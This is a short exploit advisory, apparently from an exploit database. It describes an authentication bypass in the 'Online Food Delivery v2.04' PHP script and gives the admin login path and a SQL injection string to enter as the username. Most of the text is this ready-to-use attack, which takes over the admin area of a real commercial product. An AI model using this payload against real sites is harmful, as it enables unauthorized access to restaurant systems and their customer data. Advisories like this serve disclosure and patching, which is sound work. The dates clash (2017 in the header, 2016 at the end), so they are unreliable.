Online Food Delivery v2.04 - Authentication bypass - 12.01.2017

Authentication bypass should give you access to the admin area.


# Vulnerability: Online Food Delivery v2.04 Authentication bypass
# Date: 12.01.2017
# Software link: http://itechscripts.com/food-delivery/
# Demo: http://restaurant.itechscripts.com
# Price: 49$
# Category: webapps
# Exploit Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawid.morawski1990@gmail.com
#######################################

Description:
Authentication bypass should give you access to the admin area.


Go to http://localhost/[PATH]/admin/admin_login.php and set:

Username: 1’ or 1=1 – -
Password: anything

Written on January 12, 2016